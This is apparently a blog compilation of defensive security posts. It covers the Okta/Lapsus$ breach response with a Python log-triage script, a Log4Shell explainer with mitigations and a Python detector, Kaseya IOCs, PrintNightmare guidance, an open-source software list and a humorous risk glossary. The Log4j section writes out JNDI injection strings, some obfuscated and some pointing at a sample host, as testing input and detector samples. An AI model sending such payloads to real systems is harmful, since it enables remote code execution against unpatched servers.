Extortion group Lapsus$ posted screenshots of what it claimed were #okta's internal systems. The hackers claimed not to have accessed or obtained data on #okta itself and were focused on the company's customers, which include high-profile government and non-government customers.
The hacking group has attacked other high-profile targets in recent weeks, including NVIDIA, Samsung and Ubisoft. NVIDIA confirmed that hackers obtained company data in February, while Lapsus$ claimed to have leaked 190GB of Samsung data.
#lapsus$ also released a torrent on Monday that is said to contain 37GB of source code for around 250 projects. The group claims the data includes 90 percent of Bing's source code and 45 percent of Cortana and #Bing Maps code. Other affected projects appear to include websites, mobile apps and web-based infrastructure.
#Okta develops and maintains Identity and Access Management systems. In particular, they provide a Single Sign-On solution. A huge number of large companies employ Okta’s solutions.
While the full scope and impact of the potential attack are not yet clear, the following precautionary steps are recommended to ensure that potential damage is contained:
• Revoke all active logins and make all users re-authenticate.
• Plan to start rotating keys and credentials. Rotating may force users to re-authenticate anyway, but the attacker could already have a computer logged into your org.
• Rotate critical credentials managed in Okta solutions, including API keys, passwords, and Multi-Factor Authentication tokens. Once this is accomplished, and based on ongoing publication of new information, full rotation of all Okta credentials may be advised.
• Investigate Okta logs: Perform a focused investigation into Okta logs to identify irregular access which may indicate malicious activity targeting organizational credentials and systems. This investigation should initially focus on identifying irregular access such as access from uncommon IP address ranges and User-Agents, or access at highly irregular times of the day or week. If possible, perform these analyses going back to the end of 2021 to cover the currently understood potential length of the breach.
• Critical asset access investigation: Perform a focused investigation to identify potential malicious access to organizational resources leveraging credentials managed in Okta, according to the same logic mentioned above. If such activities are identified, a deep-dive investigation should be initiated to assess the full potential scope of the breach.
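As an added example (not Okta's code or part of the original post), the following Python triage applies the three signals above to Okta System Log events: logins from outside an assumed corporate egress range, logins outside assumed business hours or at weekends, and a User-Agent seen only once for that user, restricted to successful session starts since the end of 2021. It assumes the documented System Log event shape (published, eventType, actor.alternateId, client.ipAddress, client.userAgent.rawUserAgent, outcome.result); the events, the trusted range and the business hours are constructed for the example.

```python
import ipaddress
import json
from collections import Counter
from datetime import datetime, timezone

# Constructed sample events in the Okta System Log shape (not real data).
SAMPLE_LOG = """\
{"published":"2022-01-18T09:12:05.000Z","eventType":"user.session.start","outcome":{"result":"SUCCESS"},"actor":{"alternateId":"alice@example.com"},"client":{"ipAddress":"203.0.113.10","userAgent":{"rawUserAgent":"Mozilla/5.0 (Windows NT 10.0) Chrome/97.0"}}}
{"published":"2022-01-19T10:40:11.000Z","eventType":"user.session.start","outcome":{"result":"SUCCESS"},"actor":{"alternateId":"alice@example.com"},"client":{"ipAddress":"203.0.113.11","userAgent":{"rawUserAgent":"Mozilla/5.0 (Windows NT 10.0) Chrome/97.0"}}}
{"published":"2022-01-21T03:02:44.000Z","eventType":"user.session.start","outcome":{"result":"SUCCESS"},"actor":{"alternateId":"alice@example.com"},"client":{"ipAddress":"198.51.100.77","userAgent":{"rawUserAgent":"python-requests/2.27.1"}}}
{"published":"2022-01-21T03:05:02.000Z","eventType":"user.session.start","outcome":{"result":"FAILURE"},"actor":{"alternateId":"bob@example.com"},"client":{"ipAddress":"198.51.100.77","userAgent":{"rawUserAgent":"python-requests/2.27.1"}}}
{"published":"2021-11-02T11:00:00.000Z","eventType":"user.session.start","outcome":{"result":"SUCCESS"},"actor":{"alternateId":"alice@example.com"},"client":{"ipAddress":"198.51.100.5","userAgent":{"rawUserAgent":"curl/7.79"}}}
"""

TRUSTED_NETS = [ipaddress.ip_network("203.0.113.0/24")]   # assumed corporate egress range
BUSINESS_HOURS = range(7, 20)                              # assumed 07:00-19:59 UTC
WINDOW_START = datetime(2021, 12, 1, tzinfo=timezone.utc)  # "end of 2021" per the advice above


def parse_events(text):
    """Parse one JSON event per line, keeping session-start events inside the window."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        when = datetime.fromisoformat(ev["published"].replace("Z", "+00:00"))
        if ev.get("eventType") != "user.session.start" or when < WINDOW_START:
            continue
        events.append({
            "when": when,
            "user": ev["actor"]["alternateId"],
            "ip": ipaddress.ip_address(ev["client"]["ipAddress"]),
            "ua": ev["client"]["userAgent"]["rawUserAgent"],
            "ok": ev["outcome"]["result"] == "SUCCESS",
        })
    return events


def flag_irregular(events):
    """Return {(user, iso_timestamp): [reasons]} for successful logins that look irregular."""
    # How often each (user, User-Agent) pair appears among successful logins.
    ua_counts = Counter((e["user"], e["ua"]) for e in events if e["ok"])
    findings = {}
    for e in events:
        if not e["ok"]:
            continue  # failed attempts are worth a separate look, not flagged here
        reasons = []
        if not any(e["ip"] in net for net in TRUSTED_NETS):
            reasons.append("untrusted-network")
        if e["when"].hour not in BUSINESS_HOURS or e["when"].weekday() >= 5:
            reasons.append("off-hours")
        if ua_counts[(e["user"], e["ua"])] == 1:
            reasons.append("rare-user-agent")
        if reasons:
            findings[(e["user"], e["when"].isoformat())] = reasons
    return findings


if __name__ == "__main__":
    for key, reasons in sorted(flag_irregular(parse_events(SAMPLE_LOG)).items()):
        print(key, ", ".join(reasons))
```

Flagged logins are a starting point for the deeper investigation described above, not a verdict on their own.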
Explaining #log4j for non-technical people, because the internet is burning down and y'all might want to know what's happening and why there's all this "${jndi:ldap" stuff out there.
Log4j is a popular logging library used in the Java programming language. A logger is a piece of software that saves data on a computer. It is used to monitor what is happening, determine if the software runs smoothly, or catch information to help debugging when things go wrong.
It logs a lot of information. When you browse to a website, it will write down what IP address you have, what browser you are using (firefox, chrome, edge... ), when you made the request, what page you accessed... and more!
So, this log4j library is used in A LOT of Java software, and there are approximately 3 billion devices that run Java. Quick math: that's huge.
Log4j is present in web servers, your phones, possibly on your smart fridge and plenty of other places...
A logger is supposed to just write down what happens to a hard drive, or send it to another server to store it. But in the case of log4j, there are a few things that are performed before writing anything. One of the things it does is look for patterns like ${something} and try to replace them with another piece of information. It is used to add context; for example, ${date} would be replaced by today's date. (I have no idea if this example works, it's just to keep it simple.)
So when there's a ${jndi: pattern, it will try to replace it.
Except that this pattern triggers another mechanism that loads a resource from another computer, anywhere on the internet, we just have to tell it where to get the data from. This data can be a malicious software.
Due to some internal Java mechanism, this malicious software is automatically run on the computer that used log4j. This means that at this point hackers can make the targeted computer do (almost) whatever they want. This gets really bad because we don't need to know which computer to target.
Remember when I said the web server logs what browser you use? Well, we can just tell it that our browser is "${jndi: [...]", and if it uses log4j it will trigger the vulnerability.
In real life that would be the same as giving the keys to your house to a random stranger you just saw pass in front of you, without even realizing it. So... yeah. #log4j. The above simple explanation is by Emy|eq on Twitter (entropyquween_).
So this is big, and it affected a lot of companies: servers confirmed to be vulnerable to Log4Shell attacks include those of Apple, Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu, DIDI, JD, NetEase, and possibly thousands more.
Apache has released Log4j 2.15.0 to address the maximum-severity CVE-2021-44228 RCE vulnerability. https://t.co/PzSkXJUxEi
Workaround so far: Upgrade log4j, or if you cannot upgrade, you can mitigate the RCE vulnerability by setting log4j2.formatMsgNoLookups to true (-Dlog4j2.formatMsgNoLookups=true on the JVM command line).
Note that this workaround only works for log4j2 versions 2.10 to 2.15. If companies have an older version of the log4j2 library (note that having an older version inside a .jar archive does count), this workaround is not safe to use.
Mitigation for previous releases (>=2.10): set the system property "log4j2.formatMsgNoLookups" to "true", or remove the JndiLookup class from the classpath.
Issue Found on update:
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), to craft malicious input data using a JNDI Lookup pattern, resulting in a denial of service (DoS) attack. Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.
https://www.cve.org/CVERecord?id=CVE-2021-45046
And another issue discovered: Web infrastructure company Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit a second bug disclosed in the widely used Log4j logging utility, making it imperative that customers move quickly to install the latest version as a barrage of attacks continues to pummel unpatched systems with a variety of malware.
The new vulnerability, assigned the identifier CVE-2021-45046, makes it possible for adversaries to carry out denial-of-service (DoS) attacks and follows disclosure from the Apache Software Foundation (ASF) that the original fix for the remote code execution bug — CVE-2021-44228 aka Log4Shell — was "incomplete in certain non-default configurations." The issue has since been addressed in Log4j version 2.16.0.
A. Test and detect vulnerable applications, by John Hammond
https://log4shell.huntress.com/
The explain-like-I'm-five breakdown is that you simply copy and paste the generated JNDI syntax into _anything_ (typically form fields, application input boxes, logins, anything) and check if it received a connection. No code is run other than making this connection to test.
B. How to test your apps for #log4shell vulnerability
1. Generate a DNS token https://t.co/vCzVG0O03i
2. Wrap that token in
Prefix: ${jndi:ldap://
Suffix: /a}
3. Use that value in search forms, profile data, settings etc. of your apps
4. Get notified when you triggered a reaction https://t.co/1w6jmF9qgy
C. I know that using regex is dumb and shit, but it's just a first-line defense. This one is capable of detecting obfuscated payloads and should produce very few false positives:
For forensic examiners, it's not known how practical exploitation is, but both Cellebrite BlackLight and Autopsy use components that leverage the vulnerable log4j class.
Elasticsearch for BlackLight (possibly inspector also), and Apache Solr for Autopsy keyword searching.
F. You can use these commands and rules to search for exploitation attempts against the log4j RCE vulnerability CVE-2021-44228.
Grep / Zgrep
This command searches for exploitation attempts in uncompressed files in the folder /var/log and all subfolders.
This hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.
Cryptocurrency miners EXECVE : This query hunts through EXECVE Syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded. It returns a table of suspicious command lines.
The commands and rules that customers can run to search for exploitation attempts against the log4j RCE vulnerability CVE-2021-44228 can be found here: https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
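As an added example (not the grep commands or rules from the gist linked above, nor the regex from section C), the following Python scan applies the same idea to access-log lines: it collapses the nested lookups used to hide the ${jndi: keyword (such as ${lower:j} or ${::-j}) before matching, so obfuscated attempts are caught as well as the plain prefix from section B. The log lines and addresses are constructed.

```python
import re

# Constructed sample access-log lines (not real traffic); 203.0.113.5 is a documentation address.
SAMPLE_LINES = [
    '198.51.100.9 - - [10/Dec/2021:22:14:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/94.0"',
    '198.51.100.9 - - [10/Dec/2021:22:14:05 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.5/a}"',
    '198.51.100.9 - - [10/Dec/2021:22:14:09 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://203.0.113.5/a} HTTP/1.1" 400',
    '198.51.100.9 - - [10/Dec/2021:22:14:12 +0000] "GET /?q=${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5/x} HTTP/1.1" 400',
    '198.51.100.9 - - [10/Dec/2021:22:15:00 +0000] "GET /docs/${date}.html HTTP/1.1" 404 "-" "curl/7.79"',
]

# Innermost lookups that evaluate to a literal: ${lower:X}, ${upper:X}, and the
# default-value form ${anything:-X} (which covers ${::-X}). Nested forms are
# resolved from the inside out by repeated substitution.
_LITERAL_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}")
# The pattern the page warns about, once any obfuscation has been collapsed.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Collapse literal-producing lookups until the text stops changing (bounded)."""
    for _ in range(max_rounds):
        new = _LITERAL_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
        if new == text:
            break
        text = new
    return text


def is_log4shell_attempt(line):
    """True when the line contains a ${jndi: lookup, plain or obfuscated."""
    return bool(_JNDI.search(normalize(line)))


def scan(lines):
    """Return (1-based line number, line) for every line that looks like an attempt."""
    return [(i + 1, line) for i, line in enumerate(lines) if is_log4shell_attempt(line)]


if __name__ == "__main__":
    for lineno, line in scan(SAMPLE_LINES):
        print(f"line {lineno}: {line}")
```

A hit only shows that a lookup string reached a log; whether the host was vulnerable still depends on its Log4j version and configuration, as the mitigation notes above explain.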
The term OPEN SOURCE refers to software whose source code is freely available to download, edit, use and share, with no copyright restrictions, and that's why we love it.
You will find open source versions of almost every software imaginable - from Operating systems, office suites, media to accounting, and productivity. With that in mind, here's our pick of the very best open-source software.
Operating System: Linux
Let's start with the first thing you need: an operating system for your PC or laptop. In the past 10 years, the gap between the features of all the major operating systems has become smaller and smaller. Linux operating systems aren't just for geeks and nerds. Anyone can install Linux and use it for their everyday computing needs, including browsing the web, watching Netflix, typing letters, sorting home finances, video editing, photo editing, and managing music collections. There are a lot of options to choose from, and everyone from novices to system administrators to hackers and security professionals loves Linux as their OS.
Ubuntu: One of the most popular distros for good reason, Ubuntu is an open-source operating system that runs from the desktop, to the cloud, to all your internet-connected things.
Ubuntu is officially released in three editions: Desktop, Server, and Core (for Internet of Things devices and robots). Ubuntu is a popular operating system for cloud computing. Ubuntu is released every six months, with long-term support (LTS) releases every two years. Download from here.
Linux Mint is a great 'default' distro for new Linux users, as it comes with a lot of the software you'll need when switching from Mac or Windows, such as LibreOffice, the favored productivity suite of Linux users. It also has better support for proprietary media formats, allowing you to play videos, DVDs, and MP3 music files out of the box. Why not give it a go today?
The next thing you need is a productivity tool, and here LibreOffice comes to the rescue. LibreOffice is a powerful office suite: its clean interface and feature-rich tools help you unleash your creativity and enhance your productivity. LibreOffice is a full office suite, with excellent apps for text documents, spreadsheets, presentations, and databases. These are all compatible with the most recent Microsoft file formats, so you will have no trouble sharing files with users of Word, Excel, PowerPoint, and Access.
LibreOffice includes several applications that make it the most powerful Free and Open Source office suite on the market. You can download it by clicking on their official link here.
Email is a key part of our everyday life. Thunderbird is a free and open-source email, news feed, chat, and calendaring client that's easy to set up and customize. One of the core principles of Thunderbird is the use and promotion of open standards; this focus is a rejection of our world of closed platforms and services that can't communicate with each other. We want our users to have freedom and choice in how they communicate. You can download it by clicking on their official link here.
Download Mozilla Firefox, a free web browser. Firefox is created by a global non-profit dedicated to putting individuals in control online. Firefox is available for Microsoft Windows, macOS, Linux, BSD, illumos, and Solaris operating systems. Its sibling, Firefox for Android, is also available. You can download it by clicking on their official link here; you can even download it in your own language.
GnuCash is personal and small-business financial-accounting software, freely licensed under the GNU GPL and available for GNU/Linux, BSD, Solaris, Mac OS X, and Microsoft Windows. Designed to be easy to use, yet powerful and flexible, GnuCash allows you to track bank accounts, stocks, income, and expenses. As quick and intuitive to use as a checkbook register, it is based on professional accounting principles to ensure balanced books and accurate reports. Download here
When your computer is getting full, BleachBit quickly frees disk space. When your information is only your business, BleachBit guards your privacy. With BleachBit you can free cache, delete cookies, clear Internet history, shred temporary files, delete logs, and discard junk you didn't know was there. Designed for Linux and Windows systems, it wipes clean thousands of applications including Firefox, Internet Explorer, Adobe Flash, Google Chrome, Opera, Safari, and more.
Beyond simply deleting files, BleachBit includes advanced features such as shredding files to prevent recovery, wiping free disk space to hide traces of files deleted by other applications, and vacuuming Firefox to make it faster. Better than free, BleachBit is open source. Download link
Today you need to remember many passwords. You need a password for the Windows network logon, your e-mail account, your website's FTP password, online passwords (like website member accounts), etc. The list is endless. Also, you should use different passwords for each account, because if you use only one password everywhere and someone gets this password, you have a problem... A serious problem. The thief would have access to your e-mail account, website, etc. Unimaginable.
KeePass is a free open source password manager, which helps you manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password, or select the key file, to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish). Download link
Safeguard Your Data/ Disk Encryption:
DiskCryptor is an open encryption solution that offers encryption of all disk partitions, including the system partition. DiskCryptor is file and drive encryption software with all the bells and whistles you will ever need. Just like TrueCrypt, DiskCryptor can encrypt any of your files, system drives, and other external devices like CDs and thumb drives. Moreover, DiskCryptor can encrypt your data with different encryption algorithms like AES (Advanced Encryption Standard), Twofish and Serpent, and also uses a combination of cascaded algorithms for increased security. If you were previously using TrueCrypt for your encryption purposes, then DiskCryptor is the closest free option available with active development and support.
VLC media player (commonly known as VLC) is a free and open-source, portable, cross-platform media player and streaming media server. VLC offers everything you could need from a media player: comprehensive format support, streaming, downloading, and much more. Download here
GIMP is a cross-platform image editor available for GNU/Linux, OS X, Windows, and more operating systems. It is free software: you can change its source code and distribute your changes. Whether you are a graphic designer, photographer, illustrator, or scientist, GIMP provides you with sophisticated tools to get your job done. You can further enhance your productivity with GIMP thanks to many customization options and 3rd party plugins. Download Link
Shotcut is a free, open-source, cross-platform video editor for Windows, Mac and Linux. Major features include support for a wide range of formats; no import required, meaning native timeline editing; Blackmagic Design support for input and preview monitoring; and resolution support up to 4K. More features and download link here
Audacity is free, open-source, cross-platform audio software: an easy-to-use, multi-track audio editor and recorder for Windows, Mac OS X and GNU/Linux. Download Here
What did we miss?
Is there an open-source application that we missed? These are just a few of the best open-source/free software packages I use personally. They offer terrific value, and since most of them are open source they are more secure for your privacy and protection in this digital age.
We think of this as a work in progress, so if you believe there is software that should be added to this list, please let us know in the comments section below.
An insider can be ANYONE: an employee, contractor, business partner, etc., with the right motive and means, and with tactics at their disposal that will put an organization's assets at risk.
An organization must Think Outside The Box to successfully detect and mitigate the risks posed by Insiders.
Malicious insiders don't care about compliance regulations. They just look for security gaps and vulnerabilities within an organization to achieve their objectives. The impacts from insider threat incidents can be very severe, costly and damaging.
Not all incidents by insiders are malicious. Non-malicious insider incidents can be just as damaging as malicious incidents. Given this threat landscape, it is imperative that critical infrastructure entities prioritize and dedicate resources to preempt and/or mitigate insider threats.
To help, The National Counterintelligence and Security Center (NCSC) issued “Insider Threat Mitigation for U.S. Critical Infrastructure Entities: Guidelines from an Intelligence Perspective”. Read the attached document if you are interested.
Related to this is another whitepaper by Simone (Cy) Genna, published by SANS, titled "Information Security Starts with the Employees", which you can download from here.
After #printnightmare, another high alert for the security community and administrators. No weekends or holidays for #cybersecurity.
#Kaseya VSA Supply-Chain #Ransomware Attack: the ransomware group REvil is exploiting vulnerable instances of Kaseya VSA globally.
Kaseya VSA is a platform that provides endpoint management and network monitoring. Anyone who is currently using, or has an MSP that is running, #Kaseya software has potentially been compromised!
Once inside the supplier’s system, attackers use it as a jumping off point to access its customers’ networks too. Then they install ransomware, which locks up victims’ data, only releasing it once a ransom payment has been made.
It is recommended that organisations follow the advice provided by Kaseya and immediately #shutdown their Kaseya server until further notice.
So far 200 US companies are affected, and one of Sweden's biggest grocery chains closed all of its 800 stores today after this attack, as it was unable to operate its cash registers.
Technical Details:
Kaseya supply chain attack Indicators of Compromise (IOCs)
HASHES (SHA256)
d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
More info available here:
https://lnkd.in/gJ5hfD2
Someone rightly said: cybercriminals are awful for a whole bunch of reasons, but especially for ruining long weekends and holidays for IT professionals over and over again.
Be nice to your IT team. They're the ones working through the nights and weekends to protect you from these scum.
A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations.
An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges.
Attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
Due to the possibility of exposure, domain controllers and Active Directory admin systems need to have the #Print #spooler service disabled. Do it now and save yourself from the Print Spooler vulnerability CVE-2021-34527 #printnightmare
See the flowchart to determine whether you are required to disable the Print Spooler now.
If disabling the Print Spooler service is appropriate for your organisation, you can do so in the following way.
1. The recommended way to do this is using a Group Policy Object via
A real-life example of cyber risk response. This might help you understand some key concepts in the cyber world. After all, cyber security doesn't have to be boring, right? Then read on; this might make you smile.
Threat Actors = someone who wants to punch you in the face.
Threat = the punch being thrown.
Severity = whether you fall down after the punch, and how long it might take for you to stand up again.
Vulnerability = your inability to defend against the punch.
Risk = the likelihood of getting punched in the face.
Acceptable Risk = your willingness to be punched in the face.
Attack Surface = the size and shape of your face.
Impact = broken nose, medical bills, lost time at work.
Single loss event = one tooth.
Risk appetite = number of teeth you're willing to part with.
Compensating control = dentures / mate who was in the special forces.
Vulnerability Assessment = checking the size and shape of your face.
Compliance = how you think this all works until you've been punched in the face.
Risk posture = whether you know that talking shit in a pub is likely to get you punched in the face or not.
RTO = how long it takes you to regain consciousness.
RPO = how much you forget when you blacked out.
Cyber Risk Insurance = your mates at the pub betting on if you can "talk that kinda shit" and not get punched in the face.
Penetration testing / PEN TEST = saying "boo" very loudly to see if you'll protect your face.
Red Team = boxing.
Exploit = the fist.
0day = kick in the groin.
Side channel = your wallet being nicked whilst you are being punched in the face.
APT = a mate who also wants to punch you in the face.
Unhackable = pissing off professional boxers while bragging about your knowledge of Karate.
Bounty Hunter = someone who promises to wear gloves when they punch you if you promise to pay them based on where they punch you.
Bug Crowd = cage fight organizer.
Security stack / Blue Team = your mates at the pub with you.
Patch Tuesday = your weekly gym visit.
Alert = friend who calls an ambulance.
Investigation ➡️ triage = the EMTs who arrive.
Incident response = the doctors who remediate your punched face.
Digital forensics = documenting your injuries to reconstruct the type of punch in detail.
Threat Intelligence = pointing at a person that has a history of punching people in the face, i.e. “Bob's going to come at you with a right cross”.
Air gap = avoiding the pub by staying at home.
DEFCON presentation = all of your friends getting drunk in Las Vegas watching video of you being punched in the face.
Enjoy your day.
Credit: it all started from the caseyjohnellis (@cje) Twitter account.